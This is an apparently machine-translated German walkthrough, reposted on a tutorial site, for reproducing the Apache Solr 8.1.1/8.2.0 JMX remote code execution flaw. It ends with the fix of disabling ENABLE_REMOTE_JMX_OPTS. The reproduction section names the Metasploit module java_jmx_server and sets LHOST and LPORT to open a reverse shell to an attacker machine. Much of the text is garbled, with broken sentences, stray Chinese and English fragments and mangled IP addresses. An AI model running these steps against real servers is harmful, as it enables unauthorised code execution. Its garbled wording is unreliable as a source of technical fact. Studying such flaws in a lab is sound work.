Heim  >  Artikel  >  Betrieb und Instandhaltung  >  So reproduzieren Sie die RCE-Schwachstelle im Apache Solr JMX-Dienst

So reproduzieren Sie die RCE-Schwachstelle im Apache Solr JMX-Dienst

WBOY
WBOYnach vorne
2023-05-14 14:25:061451Durchsuche

0x00 Einführung

Solr ist ein unabhängiger Suchanwendungsserver auf Unternehmensebene, der eine API-Schnittstelle ähnlich einem Webdienst bereitstellt. Benutzer können XML-Dateien in einem bestimmten Format über http-Anfragen an den Suchmaschinenserver senden, um Indizes zu generieren. Sie können auch Suchanfragen über HTTP-Get-Vorgänge stellen und Ergebnisse im XML-Format erhalten.

Diese Sicherheitslücke ist auf das Sicherheitsrisiko in der Konfigurationsoption ENABLE_REMOTE_JMX_OPTS in der Standardkonfigurationsdatei solr.in.sh zurückzuführen.

Die Option ENABLE_REMOTE_JMX_OPTS="true" ist in der integrierten Konfigurationsdatei solr.in.sh der Versionen 8.1.1 und 8.2.0 von Apache Solr vorhanden.

Wenn Sie die Standarddatei solr.in.sh aus der betroffenen Version verwenden, wird die JMX-Überwachung aktiviert und auf RMI_PORT (Standard = 18983) verfügbar gemacht,

und es ist keine Authentifizierung erforderlich. Wenn dieser Port in der Firewall für eingehenden Datenverkehr geöffnet ist, kann jeder mit Netzwerkzugriff auf den Solr-Knoten auf JMX zugreifen,

und Schadcode hochladen, der auf dem Solr-Server ausgeführt wird. Diese Sicherheitslücke betrifft keine Benutzer von Windows-Systemen, sondern nur Benutzer einiger Linux-Versionen.本0x01 Impact Version 0apache Solr8.1.1 Version Line Time: 2019-05-28

APACHE SOLR8.2.0 Version Line Time: 2019-07-25

0x02 Vulnerability Harm

Wenn das Opfer verwendet wird, ist das Opfer es Wird vom Opfer verwendet. Ohne diese Standardkonfiguration wird der JMX-Dienst auf dem Standardport 18983 geöffnet und die Authentifizierung ist standardmäßig nicht aktiviert. Jeder Angreifer mit Zugriff auf diesen Port könnte diese Schwachstelle ausnutzen, um einen Angriff auf den betroffenen Dienst zu starten und beliebigen Code auszuführen.

0x03 Umgebungskonstruktion

Java-Umgebung und Kali-System, Solr 8.20

Solr 8.20 Download-Adresse: wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2 .0.zip

Verwenden Sie unzip solr-8.2.0.zip zum Dekomprimieren

如何进行Apache Solr JMX服务RCE漏洞复现

Nach Abschluss der Dekomprimierung wechseln Sie in das bin-Verzeichnis, um Solr zu starten

./solr start -force

如何进行Apache Solr JMX服务RCE漏洞复现

Zugriff nach dem Start: http://192.168.10.176:8983/

如何进行Apache Solr JMX服务RCE漏洞复现

0x04-Schwachstellenwiederkehr

如何进行Apache Solr JMX服务RCE漏洞复现 Angreifende Maschine: Kali IP: 192.168.10.147

Opfermaschine: Docker-IP in Ubuntu18. 6: 192.168. 10 .184:8983 1. Verwenden Sie nmap, um den Port zu scannen und festzustellen, dass Port 18983 geöffnet ist. multi/misc/java_jmx_server

Ø LHOST 192.16 8.10 einstellen. 147

ø setzen LPORT 4444

如何进行Apache Solr JMX服务RCE漏洞复现3. .sh-Konfigurationsdatei auf „false“ setzen und dann den Solr-Dienst neu starten.

Das obige ist der detaillierte Inhalt vonSo reproduzieren Sie die RCE-Schwachstelle im Apache Solr JMX-Dienst. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Dieser Artikel ist reproduziert unter:yisu.com. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen